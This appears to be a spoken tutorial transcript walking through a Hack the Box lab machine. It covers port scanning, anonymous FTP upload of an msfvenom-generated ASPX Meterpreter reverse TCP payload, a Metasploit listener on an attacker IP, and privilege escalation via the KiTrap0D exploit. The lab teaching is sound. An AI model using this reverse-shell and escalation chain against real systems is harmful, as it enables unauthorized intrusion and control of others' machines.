All right, so here we go. We've learned what Hack the Box is, how we can use it, how we can access the labs. So here I want to practice what you're going to do with the machines. Now, there are many different types of machines in Hack the Box, so don't think that you're going to follow the same steps on every single machine, like right here in the video. You're going to need to find your own way when dealing with other machines. In this section, though, we're going to explain to you what are these machines and how we can actually play with them. Yeah? So first, after running the OpenVPN, we need to start the target machine. So you got to select the machine and hit Spawn Machine. Open Kali and try to ping the target machine. So write ping and target the IP address. And as you can see, after hitting the spawn machine, Hack the Box provides us with the target machine's IP address. All right, so you can see here that we can ping the target IP address. So let's start with searching for open ports of that target machine. For that, I'm going to use nmap for the port scan. So I write nmap-sv for version detection, -sc for script scan, and the target IP address. Oh, what do we got here? See, we can see here that there are two open ports, port 21, which is for FTP, File Transfer Protocol, and here it's Microsoft FTP. Port 80 for Hypertext Transfer Protocol, HTTP, and you can see it's an IIS server. So the most likely initial hack vector appears to be the FTP in this case. So let's go to the web page. Here we've got the main page. And for step 2, we are going to try to find a way in. Now, in this case, the most likely entry method appears to be a misconfiguration or weak login credentials. So I'm going to first try to connect anonymously via FTP. Username is anonymous, and we'll enter a password that you want to start with. The password's not really important here. If I write the dir command, well, we can see the file that we see on the website. So I think we can upload a vulnerable file. Now, the echo command is one of the most basic, as well as frequently used commands in Linux. I can create a file with the FTP, and with the put command, we can upload the file. But the important thing here is you need to be on the same path with the file that you want to upload. Yeah? Okay. So be on the same path as the test file that you will upload before making your FTP connection. All right. Write put and the file name. Whoa. See how easily we can upload a file. All right, so here's a plan. We know that we need to create a reverse shell, which is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection. So when we use it by code or command execution, we're in. The reverse TCP shell should be used for Windows, and for that we're going to use Meterpreter. So we'll use MSF Venom to craft the exploit, and we need to use Metasploit as a listener. All right. So first write MSF Venom -help. And we're going to use -p for payload, -f for format type, and we'll enter the L port and L host, which is the attacker device's IP and port address. So here write ms venom -p windows /meterpreter /reverse_TCP. So now we need to learn the L host. Write ifconfig and enter your machine IP address. So the L port will be 4444 because on the Metasploit side, That's the listener running on port 4444. But of course, we could change that port address if you want to, but right now there's no point to change it. All right. So after entering L port with the -F parameter, we're going to write ASPX, and we'll use the right angle bracket because we'll need to give the vulnerable file a name. You with me so far? So the vulnerable file's ready. We can go ahead and upload it. Open the FTP and upload the file to the target machine. All right, so after uploading the file, write MSF console. And we'll first set up the payload. So just write set payload windows slash meterpreter slash reverse underscore TCP. So if you write show options, you can see what's missing. We'll enter the lhost, set lhost 10.10.14.15. Finally, the L port, set L port 4444. All right. So everything is ready. Now we can execute the run command. Now let's go back to the browser and access a page where the malicious script is hosted. So you should see a Meterpreter session created. Run a shell command to get a shell. All right, but as you can see, we don't have any power in here. So we're going to need to perform privilege escalation. So we'll write a background command to take this session into the background. In fact, I'll show you a little thing. We can get some pretty reliable suggestions with a local exploit suggester module. So we'll run this module type search suggest, right? Copy and paste. So let's have a look at the list. Bypass AUC event viewer fails due to the IIS user not being part of the administrators group. Well, that's the default. That's to be expected. But the second option, MS10015 Kitra P0D, that's going to do the trick. So if you write show options, you can see what's missing. We'll enter the lhost, set lhost 10.10.14.15. All right. So everything is ready. Now we can execute the run command. All right, so now I'm going to need to enter the flags, search the paths, and after that, go to the machine website and hit submit a flag. All right, so that's how you get started playing around with a machine. Have some fun with that, don't you think?